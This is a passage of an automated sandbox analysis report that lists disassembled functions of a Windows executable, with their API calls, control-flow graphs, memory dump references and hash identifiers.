                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02100420,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02100420,00409AD8,00000000), ref: 00409A70
                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02100420,00409AD8), ref: 00409AA4
                                                                                                                                                                                                                                    • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02100420), ref: 0040966C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                                                                                                                                                  • String ID: D
                                                                                                                                                                                                                                  • API String ID: 3356880605-2746444292
                                                                                                                                                                                                                                  • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                                                                                                                                  • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 150 4019c3-4019c8 RtlLeaveCriticalSection 145->150 151 4019cd 145->151 147 401983-401995 146->147 147->147 149 401997-4019a6 147->149 149->145 150->151
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 730355536-0
                                                                                                                                                                                                                                  • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                                                                                                                  • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040A814 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                  • String ID: .tmp$y@
                                                                                                                                                                                                                                  • API String ID: 2030045667-2396523267
                                                                                                                                                                                                                                  • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                                                                                                                                  • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040A82F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                  • String ID: .tmp$y@
                                                                                                                                                                                                                                  • API String ID: 2030045667-2396523267
                                                                                                                                                                                                                                  • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                                                                                                                                  • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                  • String ID: .tmp
                                                                                                                                                                                                                                  • API String ID: 1375471231-2986845003
                                                                                                                                                                                                                                  • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                                                                                                                                                  • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 346 4076e8-4076ea call 40748c 343->346 347 4076ef-4076f2 343->347 345 407770-407785 344->345 350 407787 345->350 351 4077f9 345->351 346->347 348 407700-407704 347->348 349 4076f4-4076fb call 4073ec 347->349 349->348 354 40778a-40778f 350->354 355 4077fd-407802 350->355 356 40783b-40783d 351->356 357 4077fb 351->357 360 407803-407819 354->360 362 407791-407792 354->362 355->360 358 407841-407843 356->358 357->355 361 40785b-40785c 358->361 360->361 372 40781b 360->372 363 4078d6-4078eb call 407890 InterlockedExchange 361->363 364 40785e-40788c 361->364 365 407724-407741 362->365 366 407794-4077b4 362->366 387 407912-407917 363->387 388 4078ed-407910 363->388 381 407820-407823 364->381 382 407890-407893 364->382 368 407743 365->368 369 4077b5 365->369 366->369 373 407746-407747 368->373 374 4077b9 368->374 377 4077b6-4077b7 369->377 378 4077f7-4077f8 369->378 379 40781e-40781f 372->379 373->342 380 4077bb-4077cd 373->380 374->380 377->374 378->351 379->381 380->358 384 4077cf-4077d4 380->384 385 407824 381->385 386 407898 381->386 382->386 384->356 392 4077d6-4077de 384->392 390 407825 385->390 391 40789a 385->391 386->391 388->387 388->388 393 407896-407897 390->393 394 407826-40782d 390->394 395 40789f 391->395 392->345 404 4077e0 392->404 393->386 397 4078a1 394->397 398 40782f 394->398 395->397 400 4078a3 397->400 401 4078ac 397->401 402 407832-407833 398->402 403 4078a5-4078aa 398->403 400->403 405 4078ae-4078af 401->405 402->356 402->379 403->405 404->378 405->395 406 4078b1-4078bd 405->406 406->386 407 4078bf-4078c0 406->407
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                                                  • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                                                                                                                                                  • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401FD4 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 416 401fed-401fef 409->416 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 414 402027 413->414 415 40202c-402032 413->415 414->415 417 402038-40203c 415->417 418 4020cb-4020d1 415->418 416->410 419 401ff1-401ff6 416->419 422 402041-402050 417->422 423 40203e 417->423 420 4020d3-4020e0 418->420 421 40211d-40211f call 401ee0 418->421 424 40214f-402158 419->424 425 4020e2-4020ea 420->425 426 4020ef-40211b call 402f54 420->426 432 402124-40213b 421->432 422->418 427 402052-402060 422->427 423->422 425->426 426->424 430 402062-402066 427->430 431 40207c-402080 427->431 434 402068 430->434 435 40206b-40207a 430->435 437 402082 431->437 438 402085-4020a0 431->438 439 402147 432->439 440 40213d-402142 RtlLeaveCriticalSection 432->440 434->435 441 4020a2-4020c6 call 402f54 435->441 437->438 438->441 440->439 441->424
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                                                                                                                                                                    • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                                                                                                                    • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                                                                                                                    • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                                                                                                                    • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 296031713-0
                                                                                                                                                                                                                                  • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                                                                                                                                                  • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLibraryLoadMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2987862817-0
                                                                                                                                                                                                                                  • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                                                                                                                  • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020F03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                                                                  • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                                                                                                                  • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1948546556-0
                                                                                                                                                                                                                                  • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                                                                                                  • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020F03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                                                                  • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                                                                                                  • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
